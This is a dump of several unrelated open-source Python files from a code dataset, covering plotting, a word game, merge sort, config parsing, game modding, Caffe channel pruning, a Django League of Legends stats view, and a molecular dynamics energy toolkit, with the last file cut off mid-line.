griddata\nimport matplotlib.pyplot as plt\nimport random\n\ndef myfunc():\n temp = [random.normalvariate(50,20) for _ in xrange(100)]\n\n lat = [\"{0:.6f}\".format(random.uniform(40.25,40.46)) for _ in xrange(100)]\n long = [\"{0:.6f}\".format(random.uniform(-74.2,-74.40)) for _ in xrange(100)]\n \n x = np.random.randn(8873)\n y = np.random.randn(8873)\n '''\n plt.plot(lat, long, 'ro')\n\n plt.xlabel('latitude')\n plt.ylabel('longitude')\n plt.title('testing here')\n plt.grid(True)\n plt.savefig(\"test.png\")\n plt.show()\n '''\n heatmap, xedges, yedges = np.histogram2d(x, y, bins=50)\n extent = [xedges[0], xedges[-1], yedges[0], yedges[-1]]\n\n plt.clf()\n plt.imshow(heatmap, extent=extent)\n plt.show()\n\n \ndef main():\n temp = [random.normalvariate(50,5) for _ in xrange(100)]\n\n lat = [\"{0:.6f}\".format(random.uniform(40.42,40.46)) for _ in xrange(100)]\n long = [\"{0:.6f}\".format(random.uniform(-74.36,-74.40)) for _ in xrange(100)]\n \n a = []\n f = open('testdata.txt','w')\n for i in xrange(100):\n a.append((lat[i],long[i],temp[i]))\n if i == 99:\n f.write(str(lat[i]) + ' ' + str(long[i]) + ' ' + str(temp[i])) #don't add newline on last entry\n else:\n f.write(str(lat[i]) + ' ' + str(long[i]) + ' ' + str(temp[i]) + '|')\n #print a[i]\n #print a[0]\n \n # f.write('{location: new google.maps.LatLng(' + str(lat[i]) + ', ' + str(long[i]) + '), weight: ' + str(temp[i]) + '}') #don't add newline on last entry\n # else:\n # f.write('{location: new google.maps.LatLng(' + str(lat[i]) + ', ' + str(long[i]) + '), weight: ' + str(temp[i]) + '},\\n')\n \n # 'a' is of the format [(lats, lons, data), (lats, lons, data)... (lats, lons, data)]\n lats = [ x[0] for x in a ]\n lons = [ x[1] for x in a ]\n data = [ x[2] for x in a ]\n lat_min = min(lats)\n lat_max = max(lats)\n lon_min = min(lons)\n lon_max = max(lons)\n data_min = min(data)\n data_max = max(data)\n\n fig = plt.figure()\n\n ngrid = 500\n x = np.array(lats)\n y = np.array(lons)\n z = np.array(data)\n \n xi = np.linspace(lat_min, lat_max, ngrid)\n yi = np.linspace(lon_min, lon_max, ngrid)\n xi, yi = np.meshgrid(xi, yi)\n zi = griddata(x, y, z, xi, yi)\n \n # draw the map\n plt.xlim(lat_min, lat_max)\n plt.ylim(lon_min, lon_max)\n cs = plt.contourf(xi, yi, zi, 20, linewidths=1)\n plt.scatter(x, y, c=z, s=20)\n plt.colorbar(cs, shrink = 0.8, extend=\"both\")\n\n plt.show()\n \nif __name__ == '__main__':\n main()","repo_name":"sbakht/Submarine","sub_path":"visualization/testgraph.py","file_name":"testgraph.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73687286507","text":"\nsecret_word='peruano'\nhint=\"_\"*len(secret_word)\nprint('Welcome to the word guessing game!')\nprint()\nprint(f'your hint have {len(secret_word)} letters: {hint}')\n\nplay=False\n\nwhile(play==False):\n \n display=''\n user_word=input('what is your guess? :')\n if(len(secret_word)==len(user_word)):\n i=0\n while i<(len(user_word)):\n j=0\n correct_guess=0\n while j<(len(secret_word)-1):\n if (user_word[i]==secret_word[j]):\n \n if j==i:\n display=display+user_word[i].upper()\n correct_guess=1\n else:\n display=display+user_word[i].lower()\n correct_guess=1 \n j=j+1 \n\n if correct_guess==0:\n display=display+'_' \n \n i=i+1\n \n play=False\n \n else:\n print('Sorry, the guess myst have the same number of letter as the secret word')\n play=False\n \n print(f'Your hint is: {display}') \n if(secret_word.lower()==display.lower()):\n print('Congratulations! You guessed it!')\n play=True\n else:\n play=False\n\n \n\n \n \n \n\n ","repo_name":"carlospoma23/BYUI","sub_path":"semester1/ces110/week7/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12718692200","text":"############################################################################################\n# Name: Peter Moldenhauer\n# Class: CS 325-400\n# Date: 9/25/17\n# Description: This program implements the merge sort algorithm.\n# It reads in input data from data.txt and outputs data to merge.out\n#\n# Note: To complete this implementation of the merge sort algorithm,\n# I used the following resources:\n# 1) The \"using induction to prove the correctness of algorithms\" class lecture video\n# 2) The website: https://rosettacode.org/wiki/Sorting_algorithms/Merge_sort\n# 3) The website: https://teamtreehouse.com/community/merge-sort-in-python\n#############################################################################################\n\n# used to get programs execution time\nimport time\nstartTime = time.time()\n\n# mergeSort function\ndef mergesort(theArray):\n # if the array has only one element just return the array\n if len(theArray) == 1:\n return theArray\n # otherwise recursively call mergeSort on both parts of theArray\n else:\n # get the midpoint of theArray\n midpoint = len(theArray)/2\n firstHalf = mergesort(theArray[:midpoint])\n secondHalf = mergesort(theArray[midpoint:])\n return merge(firstHalf, secondHalf)\n\n# merge helper function for mergeSort\ndef merge(firstHalf, secondHalf):\n # empty array to hold sorted values\n sortedArray = []\n # add to sortedArray until either firstHalf or secondHalf of the array is empty\n while len(firstHalf) != 0 and len(secondHalf) != 0:\n if firstHalf[0] < secondHalf[0]:\n sortedArray.append(firstHalf[0])\n firstHalf.remove(firstHalf[0])\n else:\n sortedArray.append(secondHalf[0])\n secondHalf.remove(secondHalf[0])\n # add the remaining value to sortedArray\n if len(firstHalf) == 0:\n sortedArray += secondHalf\n else:\n sortedArray += firstHalf\n return sortedArray\n\n# open input file and create output file\ninput_file = open('data.txt', 'r')\noutput_file = open('merge.out', 'w')\n\n# convert the string from input file to an array of characters\narrayIn = input_file.readline().split(' ')\n\n# loop through the array, sort it and get another array to sort (if applicable)\nwhile arrayIn != ['']:\n # convert array of character to array of integers\n arrayIn = map(int, arrayIn)\n\n # discard the first number, first number is array length (for C++ users)\n arrayIn = arrayIn[1:]\n\n # call mergesort function to sort the array\n arrayOut = mergesort(arrayIn)\n\n # output the sorted array to the output file\n output_file.write(' '.join(map(str, arrayOut)))\n output_file.write('\\n')\n\n # get the next array in data.txt (if applicable)\n arrayIn = input_file.readline().split(' ')\n\n# close the files\ninput_file.close()\noutput_file.close()\n\n# print the programs execution time\nprint(\"--- %s seconds ---\" % (time.time() - startTime))\n","repo_name":"Peter-Moldenhauer/Algorithms-For-School","sub_path":"Assignment 1/mergesort.py","file_name":"mergesort.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42592575876","text":"#\n# Get the current working directory of this script.\n#\n# The join() call prepends the current working directory, but the\n# documentation says that if some path is absolute, all other paths left\n# of it are dropped. Therefore, getcwd() is dropped when dirname(__file__)\n# returns an absolute path. The realpath call resolves symbolic links if\n# any are found.\n#\n__location__ = os.path.realpath(\n os.path.join(os.getcwd(), os.path.dirname(__file__)))\n\n#\n# Create a config parser instance and read in the config file, located\n# in the same directory as this script.\n#\nconf = configparser.ConfigParser()\nconf.read(os.path.join(__location__, 'prkeeper.conf'))\n\n# Download settings\ndownload_path = conf['downloads']['download_path']\nstatus_file = conf['downloads']['status_file']\n\n# Logging settings\nlogfile = conf['logging']['logfile']\nlog_to_console = conf['logging']['log_to_console']\nlog_to_file = conf['logging']['log_to_file']","repo_name":"bradleyfrank/notes-etc","sub_path":"scripts/Python/config_parser.py","file_name":"config_parser.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9121780060","text":"\"\"\"Script that creates the extra DrawParam slot for maps in Dark Souls 1.\n\nIn the vanilla game, only map area 15 (Sen's Fortress and Anor Londo) uses the additional DrawParam slot, but it works\nfor all maps. The slot can be changed with the EMEVD instruction `SetMapDrawParamSlot`, but note that this will affect\nall map blocks in that area (e.g. Firelink Shrine, Undead Burg, and the Depths will all change slot together). The slot\nis always set to 0 when the map is loaded.\n\nUnfortunately, no more than two slots can be used; the renderer glitches out with insane colors when slot 2 is assigned,\nand shows nothing when any other slots are assigned.\n\"\"\"\nimport logging\nfrom pathlib import Path\n\nfrom soulstruct.containers import Binder\n\n_LOGGER = logging.getLogger(__name__)\n\n\ndef add_draw_slot_1_to_all_map_areas(game_root_path):\n \"\"\"Add the second draw slot (slot 1) to all `aXX_DrawParam.parambnd[.dcx]` files that don't already have one.\"\"\"\n game_root_path = Path(game_root_path)\n for parambnd_path in game_root_path.glob(\"param/DrawParam\"):\n if parambnd_path.name.startswith(\"a\"):\n add_draw_slot_1_to_drawparam(parambnd_path)\n\n\ndef add_draw_slot_1_to_map_area(game_root_path, map_area_id):\n parambnd_path = Path(game_root_path) / f\"param/DrawParam/a{map_area_id}_DrawParam.parambnd\"\n try:\n return add_draw_slot_1_to_drawparam(parambnd_path)\n except FileNotFoundError:\n raise FileNotFoundError(f\"Could not locate DS1 DrawParam file for map area {map_area_id}.\")\n\n\ndef add_draw_slot_1_to_drawparam(parambnd_path):\n \"\"\"Add the second draw slot (slot 1) to the given `aXX_DrawParam.parambnd[.dcx]` file, if it doesn't already have a\n second slot (which only `a15_DrawParam.parambnd` does in vanilla).\n\n All draw parameters will be copied from slot 0.\n \"\"\"\n parambnd_path = Path(parambnd_path)\n if not parambnd_path.is_file():\n raise FileNotFoundError(f\"Could not locate DrawParam file: {str(parambnd_path)}\")\n draw_param = Binder(parambnd_path)\n\n if len(draw_param) != 12:\n _LOGGER.info(f\"DrawParam file {str(parambnd_path)} already has more than one slot.\")\n return\n\n try:\n area_id = parambnd_path.name.split(\"_\")[0][1:]\n except IndexError:\n raise ValueError(f\"Could not determine map area ID from DrawParam file name: {parambnd_path.name}\")\n\n # slot 1 files ('mXX_1_LightBank') come before slot 0 files ('mXX_LightBank'), which are both before 'sXX_LightBank'\n s_ambient = draw_param[11]\n draw_param.remove_entry(11)\n for i in range(11):\n slot_0 = draw_param[i].copy()\n slot_0.id += 11\n draw_param[i].path = draw_param[i].path.replace(f\"m{area_id}_\", f\"m{area_id}_1_\")\n draw_param.add_entry(slot_0)\n s_ambient_0 = s_ambient.copy()\n s_ambient_0.id = 23\n s_ambient.path = s_ambient.path.replace(f\"s{area_id}_\", f\"s{area_id}_1_\")\n s_ambient.id = 22\n draw_param.add_entry(s_ambient)\n draw_param.add_entry(s_ambient_0)\n draw_param.write()\n","repo_name":"Grimrukh/soulstruct","sub_path":"soulstruct/darksouls1r/utilities/add_draw_slots.py","file_name":"add_draw_slots.py","file_ext":"py","file_size_in_byte":3014,"program_lang":"python","lang":"en","doc_type":"code","stars":129,"dataset":"github-code","pt":"37"} +{"seq_id":"37528260763","text":"\n\"\"\"\nThis is Channel Pruning reproduct,but only for pruning one layer\nAuthor: YQ\ndata:2018-1-25\nFunction: 1. Low rank 2. channel prune\n\n\"\"\"\n# 1. set import libs\nimport numpy as np\nfrom sklearn.linear_model import *\nimport sys, json\nsys.path.insert(0, 'D:/Deep_Learning/Win_Caffe/caffe-blvc/python')\nimport caffe\nfrom google.protobuf import text_format\nimport google.protobuf as pb\nfrom argparse import ArgumentParser\nfrom caffe.proto.caffe_pb2 import NetParameter, LayerParameter\nfrom util import * # my function\ndevice=0 # 0 is cpu ; 1 is gpu\nif device:\n caffe.set_mode_gpu()\n caffe.set_device(0)\nelse:\n caffe.set_mode_cpu()\n#%%\nmodel_def = 'D:/INstall_files/channel_pruning/train_val.prototxt'\nmodel_weights = 'D:/INstall_files/channel_pruning/vgg16__iter_10000.caffemodel'\n\nf, t =model_def.split(\".\")\nfw, tw = model_weights.split(\".\")\n\nmodel_lr_def = f+'_lr.'+t\nmodel_lr_weights = fw+'_lr.'+tw\n\nmodel_cp_def = f+'_lr_cp.' +t\nmodel_cp_weights = fw+'_lr_cp.'+tw\n\nif 0:\n print('lr_def =',model_lr_def)\n print('lr_weights =',model_lr_weights)\n print('channel def = ', model_cp_def)\n print('channel weights =', model_cp_weights)\n\nconf = load_config('D:/CodeBook/Python/lowrankcnn/imagenet/models_vgg/config.json')\nprune_names = [name+'_h' for name in conf if name!='conv5_3'] # don`t remove con5_3\n\n# store cratio every layer\nconf_cratio = load_config('D:/CodeBook/Python/lowrankcnn/imagenet/models_vgg/config_cratio.json')\n#cratios=[conf_cratio[x[:-2]] for x in prune_names]\n# Low Rank Decomposes\nif 1:\n make_lowrank_model(model_def, conf, model_lr_def)\n \n approx_lowrank_weights(model_def, model_weights, conf, model_lr_def,\n model_lr_weights)\n\nprint('Low Rank Done')\n\n\n#bottom_layer_name =\"pool1\" # (1, 64, 112, 112) # we will channel prune on this layer ,So we change num_output on this layer\n# conv1_2_h - > relu -> pool so prune channel of conv1_2_h layer\n#top_layer_name = \"conv2_1_v\" # (1, 48 ,224, 224)\n#prune_layer_name = \"conv1_2_h\"\n\ncfg=dict()\ncfg['nPointsPerLayer'] = 10\ncfg['nBatch'] = 500\ncfg['c_ratio'] = 0.869\ncfg['alpha'] = 1e-3\nN = cfg['nBatch'] * cfg['nPointsPerLayer']\n\n\nfor prune_layer_name in prune_names:\n cfg['c_ratio'] = conf_cratio[prune_layer_name[:-2]] # c_ratio\n\n lr_net = caffe.Net(model_lr_def , model_lr_weights, caffe.TEST)\n convs_name = lr_net._blob_names\n#if prune_layer_name=='conv1_2_h':\n print(\"-----------------------------------------\")\n print(\" Start channel prune :\", prune_layer_name, 'C_ratio = ',cfg['c_ratio'])\n print('------------------------------------------')\n\n bottom_layer_name, top_layer_name = extract_layer_name(lr_net, prune_layer_name)\n\n params = get_layer_params(model_lr_def, top_layer_name)\n print('layer params :', params)\n cfg['params']= params #(pad_h, pad_w, k_h, k_w)\n pad_h, pad_w, k_h, k_w = params\n\n samples =np.random.randint(0, N, 250)\n \n X, w2, b2 ,Y, c_in, c_out = extract_feat(prune_layer_name, cfg, lr_net)\n reX = np.rollaxis(X.reshape((N,c_in, -1))[samples], 1, 0) #(64, 250 , 3*3)\n reW2 = np.transpose(w2.reshape((c_out, c_in, -1)),[1, 2, 0])\n\n reY = Y[samples].reshape(-1)\n Z =np.matmul(reX, reW2).reshape((c_in, -1)).T\n #Z = relu(Z)\n\n _solver = Lasso(alpha=1e-4, warm_start=True,selection='random' )\n def solve(alpha):\n _solver.alpha=alpha\n _solver.fit(Z, reY)\n \n idxs = _solver.coef_ != 0\n tmp = sum(idxs)\n if 1:print('Lasso score is ',_solver.score(Z,reY),end='\\t')\n return idxs, tmp\n\n left = 0\n right = cfg['alpha']\n lbound = int(c_in * cfg['c_ratio']) # 64 * 0.869 ~ 55\n rank = lbound\n rbound = 1.1*lbound\n\n while True:\n _, tmp =solve(right)\n\n if tmp rbound:\n left =alpha\n elif tmp < lbound:\n right = alpha\n else:\n break\n\n if 1:print(prune_layer_name+\" - check again: rank is \",tmp)\n rank = tmp\n\n newW2, newB2 = fc_kernel(X[:, idxs, ...].reshape((N,-1)), Y, W=w2[:, idxs, ...].reshape(c_out, -1), B=b2)\n newW2= newW2.reshape((c_out, rank, k_h, k_w))\n\n w2[:, ~idxs, ...]= 0\n w2[:, idxs, ...]=newW2.copy()\n\n newWeight2 = w2[:, idxs, ...] # (48, 55 , 3 ,1)\n if 1: \n res = rel_error(X.reshape(X.shape[0],-1).dot(w2.reshape(w2.shape[0],-1).T),Y)\n print(\"After Lasso, rMSE =\", res)\n res_relu = rel_error(relu(X.reshape(X.shape[0],-1).dot(w2.reshape(w2.shape[0],-1).T)),Y)\n print('After Lasso, rMSE-relu =', res_relu)\n \n \"\"\"generator new protobuf\"\"\"\n make_channel_pruning_model(model_lr_def, model_cp_def, prune_layer_name, rank) # (64) -> 55\n\n \"\"\"generator new weights\"\"\"\n channel_net = caffe.Net(model_cp_def, caffe.TEST)\n for layer_name, param in channel_net.params.items(): \n if layer_name == prune_layer_name:\n orig_w , orig_b = [p.data for p in lr_net.params[layer_name]]\n param[0].data[...] = orig_w[idxs,...].copy()\n param[1].data[...] = orig_b[idxs,...].copy()\n elif layer_name == top_layer_name:\n param[0].data[...] = newWeight2.copy()\n param[1].data[...] = b2.reshape(param[1].data.shape).copy()\n else:\n orig_w , orig_b = [p.data for p in lr_net.params[layer_name]]\n new_w , new_b = param[0].data, param[1].data\n new_w[...]=orig_w.copy()\n new_b[...]=orig_b.copy()\n \n channel_net.save(model_cp_weights)\n print(prune_layer_name)\n\n model_lr_def = model_cp_def\n model_lr_weights = model_cp_weights\n\nprint('Low -Rank and Channel Pruning Done!!')\n\n\n\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"ReProduceByYQ/Channel_pruning_yq","sub_path":"low_rank_and_channel_pruning.py","file_name":"low_rank_and_channel_pruning.py","file_ext":"py","file_size_in_byte":6034,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"13657553153","text":"from django.shortcuts import render\nfrom .services.summoner_data import SummonerData\nfrom .utils import get_game_type\nimport os\nfrom django.conf import settings\n\ndef home(request):\n return render(request, 'summoner_dashboard/main_page.html')\n\n\ndef summoner_info(request, summoner_name):\n api_key = settings.API_KEY\n \n summoner = SummonerData(summoner_name, api_key)\n summoner_data = summoner.league_data()\n recent_matches_data = summoner.recent_matches_data()\n top_champs_data = summoner.top_champions_data()\n role_data = summoner.role_data()\n \n \n summoner_data = {\n \"summoner_name\": summoner_name,\n \"profile_icon_id\": summoner_data[\"profile_icon_id\"],\n \"summoner_level\": summoner_data[\"summoner_level\"],\n \"soloq\": {\n \"rank\": summoner_data[\"soloq_rank\"].title(),\n \"lp\": summoner_data[\"soloq_lp\"],\n \"wins\": summoner_data[\"soloq_wins\"],\n \"losses\": summoner_data[\"soloq_losses\"],\n \"wr\": summoner_data[\"soloq_wr\"],\n },\n \"flex\": {\n \"rank\": summoner_data[\"flex_rank\"].title(),\n \"lp\": summoner_data[\"flex_lp\"],\n \"wins\": summoner_data[\"flex_wins\"],\n \"losses\": summoner_data[\"flex_losses\"],\n \"wr\": summoner_data[\"flex_wr\"],\n },\n }\n champions_played = [\n {\n \"champion_name\": champ[\"champion_name\"],\n \"cs\": champ[\"cs\"],\n \"kda\": round(champ[\"kda\"], 2),\n \"kills\": champ[\"kills\"],\n \"deaths\": champ[\"deaths\"],\n \"assists\": champ[\"assists\"],\n \"wr\": round(champ[\"wr\"]),\n \"games_played\": champ[\"matches_played\"],\n }\n for champ in top_champs_data\n ]\n \n recent_matches = [\n {\n \"game_type\": get_game_type(match[\"queue_id\"]),\n \"game_mode\": match[\"game_mode\"],\n \"queue_id\": match[\"queue_id\"],\n \"game_duration\": match[\"game_duration\"],\n \"win\": match[\"win\"],\n \"champion_name\": match[\"champion_name\"],\n \"item_ids\": [\n match[\"item0\"], \n match[\"item1\"], \n match[\"item2\"], \n match[\"item3\"], \n match[\"item4\"], \n match[\"item5\"], \n match[\"item6\"]\n ],\n \"summoner_spell_ids\": [\n match[\"summoner_spell1\"], \n match[\"summoner_spell2\"]],\n \"kills\": int(match[\"kills\"]),\n \"deaths\": int(match[\"deaths\"]),\n \"assists\": int(match[\"assists\"]),\n \"kda_ratio\": round((int(match[\"kills\"]) + int(match[\"assists\"])) / int(match[\"deaths\"]), 2) if int(match[\"deaths\"]) > 0 else round((int(match[\"kills\"]) + int(match[\"assists\"])), 2),\n \"cs\": match[\"cs\"],\n \"vision\": match[\"vision\"],\n \"participant_summoner_names\": [match[\"participant1_summoner_name\"], match[\"participant2_summoner_name\"], match[\"participant3_summoner_name\"], match[\"participant4_summoner_name\"], match[\"participant5_summoner_name\"], match[\"participant6_summoner_name\"], match[\"participant7_summoner_name\"], match[\"participant8_summoner_name\"], match[\"participant9_summoner_name\"], match[\"participant10_summoner_name\"]],\n \"participant_champion_names\": [match[\"participant1_champion_name\"], match[\"participant2_champion_name\"], match[\"participant3_champion_name\"], match[\"participant4_champion_name\"], match[\"participant5_champion_name\"], match[\"participant6_champion_name\"], match[\"participant7_champion_name\"], match[\"participant8_champion_name\"], match[\"participant9_champion_name\"], match[\"participant10_champion_name\"]\n ],\n }\n for match in recent_matches_data\n ]\n\n\n summoner_profile = {\n 'summoner_name': summoner_name,\n 'summoner_data': summoner_data,\n 'champions_played': champions_played,\n 'recent_matches': recent_matches,\n 'role_data': role_data,\n }\n \n \n return render(request, 'summoner_dashboard/summoner_page.html', summoner_profile)","repo_name":"Diegowh/whgg","sub_path":"summoner_dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4084,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16393856122","text":"from __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\nfrom __future__ import absolute_import\nfrom builtins import open\nfrom builtins import int\nfrom builtins import range\nfrom future import standard_library\nfrom configparser import ConfigParser\nimport numpy as np\nfrom MDAnalysis.lib.NeighborSearch import AtomNeighborSearch\nfrom math import pi\nimport datetime\nimport MDAnalysis\nimport multiprocessing\nimport os\nimport pkg_resources\nstandard_library.install_aliases()\n\n\ndef vdw_energy(atom1, atom2, box_dimensions):\n \"\"\"Calculate van der Waals energy.\n Parameters\n ----------\n atom1: MDAnalysis.core.groups.Atom\n First atom\n atom2: MDAnalysis.core.groups.Atom\n Second atom\n box_dimensions: numpy.ndarray\n Dimensions of the system box (for PBC imaging)\n\n Returns\n -------\n eelec : float\n Van der Waals energy in kJ/mol\n \"\"\"\n\n mixed_lj_term = np.sqrt(atom1.lj_energy*atom2.lj_energy)\n vdw_eq_radius = np.sqrt(atom1.vdw_radius*atom2.vdw_radius)\n r = MDAnalysis.lib.distances.calc_bonds(atom1.position.reshape(-1, 3),\n atom2.position.reshape(-1, 3), box_dimensions)[0]\n evdw = 4.184 * mixed_lj_term * (-2*(np.power(vdw_eq_radius/r, 6) + np.power(vdw_eq_radius/r, 12)))\n return evdw\n\n\ndef check_params(settings, filename='config.ini'):\n \"\"\"Check validity of the parameters in the config.ini file.\n Parameters\n ----------\n settings: ConfigParser\n Object containing data located in config.ini\n filename: str\n Name of the config file\n \"\"\"\n error_message = ''\n topology = settings.get('files', 'topology')\n trajectories = settings.get('files', 'trajectories').split(', ')\n extension = settings.get('files', 'filetype')\n mask1 = settings.get('parameters', 'mask1')\n mask2 = settings.get('parameters', 'mask2')\n cutoff = settings.get('parameters', 'cutoff')\n calculate_vdw = load_from_config('parameters', 'vdw')[0] == 'True'\n\n try:\n stride = int(load_from_config('parameters', 'stride', filename)[0])\n except ValueError:\n error_message = 'Stride must be an integer!'\n\n try:\n dt = int(load_from_config('parameters', 'dt', filename)[0])\n except ValueError:\n error_message = 'Timestep must be an integer!'\n\n try:\n ncores = int(load_from_config('parameters', 'ncores', filename)[0])\n except ValueError:\n error_message = 'Number of cores must be an integer!'\n\n try:\n whole_traj = MDAnalysis.Universe(topology)\n except (KeyError, ValueError) as error:\n error_message = 'Topology parsing error! (If you are sure everything is in order' \\\n ' try converting to another format)'\n except getattr(__builtins__,'FileNotFoundError', IOError):\n error_message = 'Topology file missing!'\n number_frames_total = 0\n\n if error_message == '':\n for trajectory in trajectories:\n try:\n system = MDAnalysis.Universe(topology, format=extension)\n number_frames_trajectory = len(system.trajectory)\n number_frames_total += number_frames_trajectory\n except ValueError:\n try:\n system = MDAnalysis.Universe(topology, trajectory, format=extension)\n number_frames_trajectory = len(system.trajectory)\n number_frames_total += number_frames_trajectory\n except getattr(__builtins__, 'FileNotFoundError', IOError):\n error_message = 'One or more files missing!'\n except (KeyError, ValueError) as error:\n error_message = 'Topology/trajectory error or filetype mismatch!'\n\n if error_message == '':\n if ncores > multiprocessing.cpu_count():\n error_message = 'Number of cores specified higher than available number of cores (%s)'\\\n % multiprocessing.cpu_count()\n elif ncores > (number_frames_total // stride) + 1:\n error_message = 'Number of cores higher than number of frames!'\n\n if error_message == '':\n try:\n system.select_atoms(mask1)\n except (TypeError, KeyError, MDAnalysis.exceptions.SelectionError) as error:\n error_message = 'Mask1 error!'\n if error_message == '':\n try:\n system.select_atoms(mask2)\n except (TypeError, KeyError, MDAnalysis.exceptions.SelectionError) as error:\n error_message = 'Mask2 error!'\n\n if error_message == '':\n if len(system.select_atoms(mask1)) == 0:\n error_message = 'Mask1 contains no atoms!'\n if error_message == '':\n if len(system.select_atoms(mask2)) == 0:\n error_message = 'Mask2 contains no atoms!'\n if error_message == '':\n if cutoff != '':\n try:\n cutoff = float(cutoff)\n except ValueError:\n error_message = 'Cutoff must be a number!'\n if error_message == '' and calculate_vdw:\n try:\n system.atoms[0].element == 'a'\n except:\n error_message = 'Van der Waals interactions not supported for this format!'\n\n return error_message\n\n\ndef check_plot_params(settings, filename='config_plot.ini'):\n \"\"\"Check validity of the parameters in the config_plot.ini file.\n Parameters\n ----------\n settings: ConfigParser\n Object containing data located in config_plot.ini\n filename: str\n Filename of the config file containing plotting parameters\n \"\"\"\n error_message = ''\n datafile = settings.get('files', 'datafile')\n startframe = load_from_plot_config('parameters', 'startframe', filename)\n endframe = load_from_plot_config('parameters', 'endframe', filename)\n starting_residue = load_from_plot_config('parameters', 'starting_residue', filename)\n end_residue = load_from_plot_config('parameters', 'end_residue', filename)\n range_of_values = load_from_plot_config('parameters', 'range_of_values', filename)\n\n # Check filename\n try:\n with open(datafile, 'r+') as results:\n last_line = tail(results)\n except getattr(__builtins__, 'FileNotFoundError', IOError):\n error_message = 'File not found!'\n\n # Check datafile entry validity\n if error_message == '':\n try:\n final_datafile_frame = int(last_line[0].split()[0])\n last_datafile_residue = int(last_line[0].split()[1])\n except (ValueError, KeyError) as error:\n error_message = 'Datafile error!'\n\n # Check if parameters are integers\n\n try:\n startframe = int(startframe)\n except ValueError:\n error_message = 'Starting frame must be an integer!'\n\n try:\n endframe = int(endframe)\n except ValueError:\n error_message = 'Final frame must be an integer!'\n\n try:\n starting_residue = int(starting_residue)\n except ValueError:\n error_message = 'Starting residue must be an integer!'\n\n try:\n end_residue = int(end_residue)\n except ValueError:\n error_message = 'Final residue must be an integer!'\n\n if error_message == '':\n if startframe > endframe:\n error_message = 'Starting frame number higher than final frame!'\n\n if error_message == '':\n if startframe > final_datafile_frame:\n error_message = 'Starting frame larger than total number of frames (%d)' % final_datafile_frame\n elif starting_residue > last_datafile_residue:\n error_message = 'Starting residue larger than total number of residues (%d)' % last_datafile_residue\n\n if error_message == '':\n try:\n range_of_values = float(range_of_values)\n except ValueError:\n error_message = 'Range of values must be a number!'\n return error_message\n\n\ndef load_from_config(section, parameter, filename='config.ini'):\n \"\"\"Tries loading parameters from the config.ini file. Defaults to values defined in default_values if not found in\n config.ini.\n\n Parameters\n ----------\n section: str\n Section of the .ini file\n parameter: str\n Parameter as defined in the .ini file\n filename: str\n Name of the config file\n\n Returns\n -------\n A list containing either the parameter from the input file or a default value and a boolean telling whether\n or not a default value was used (important for logging).\n \"\"\"\n\n default_values = ConfigParser()\n config = ConfigParser()\n default_values.read(pkg_resources.resource_filename('relictoolkit', 'config_defaults.dft'))\n\n config.read(filename)\n\n try:\n if config.get(section, parameter) == '':\n return [default_values[parameter], True]\n else:\n return [config.get(section, parameter), False]\n except:\n return [default_values.get(section, parameter), True]\n\n\ndef load_from_plot_config(section, parameter, filename='config_plot.ini'):\n \"\"\"Tries loading parameters from the config_plot.ini file. Defaults to values defined in default_values if not\n found in config_load.ini.\n\n Parameters\n ----------\n section: str\n Section of the .ini file\n parameter: str\n Parameter as defined in the .ini file\n filename: str\n Name of the config file\n Returns\n -------\n A parameter read from the config file or a default value defined in default_values\n \"\"\"\n config = ConfigParser()\n config.read(filename)\n datafile = config.get('files', 'datafile')\n with open(datafile, 'r+') as results:\n last_line = tail(results)\n\n default_values = {\n 'interactive': 'True',\n 'plot_type': 'time',\n 'startframe': 0,\n 'endframe': int(last_line[0].split()[0]),\n 'starting_residue': 1,\n 'end_residue': int(last_line[0].split()[1]),\n 'dt': 1,\n 'range_of_values': 0\n }\n\n try:\n if config.get(section, parameter) == '':\n return default_values[parameter]\n else:\n return config.get(section, parameter)\n except:\n return default_values[parameter]\n\n\ndef load_partial_traj(input_system, step, ncores, core):\n \"\"\"Perform trajectory pre-processing: apply periodic boundary conditions and break into multiple files for parallel\n processing.\n\n Parameters\n ----------\n input_system : MDAnalysis.Universe\n A Universe object containing the input system data loaded from topology/trajectory files\n step: int\n Trajectory sampling interval\n ncores: int\n Number of CPU cores\n core: int\n current CPU core\n \"\"\"\n\n frames_per_traj = len(input_system.trajectory) // ncores\n\n # Overhead is used to avoid loading multiple frames within a single step due to the trajectory fragmenting\n # or improper fragmentation of the trajectory\n overhead = frames_per_traj - (frames_per_traj // step) * step\n overhead = overhead * core\n overhead = overhead % step\n endframe = (core + 1) * frames_per_traj\n if overhead == 0:\n overhead = step\n\n elif overhead == step:\n endframe += 1\n\n startingframe = (core*frames_per_traj) + (step-overhead)\n\n if core == ncores-1:\n endframe = len(input_system.trajectory)\n\n with open('relic_logfile.log', 'a+') as logfile:\n logfile.write('Core %s assigned frames %s to %s\\n' % (core, startingframe, endframe))\n\n partial_traj_info = {\n 'traj': input_system.trajectory[startingframe:endframe:step],\n 'startframe': startingframe,\n 'endframe': endframe\n }\n\n return partial_traj_info\n\n\ndef electrostatic_energy(atom1, atom2, box_dimensions):\n \"\"\"Calculate electrostatic interactios within a cutoff distance.\n\n Parameters\n ----------\n atom1: MDAnalysis.core.groups.Atom\n First atom\n atom2: MDAnalysis.core.groups.Atom\n Second atom\n box_dimensions: numpy.ndarray\n Dimensions of the system box (for PBC imaging)\n\n Returns\n -------\n eelec: float\n Electrostatic energy in kJ/mol.\n \"\"\"\n\n indiel = float(load_from_config('parameters', 'indi')[0])\n interatom_distance = MDAnalysis.lib.distances.calc_bonds(atom1.position.reshape(-1, 3),\n atom2.position.reshape(-1, 3), box=box_dimensions)[0]\n eelec = 1389 * 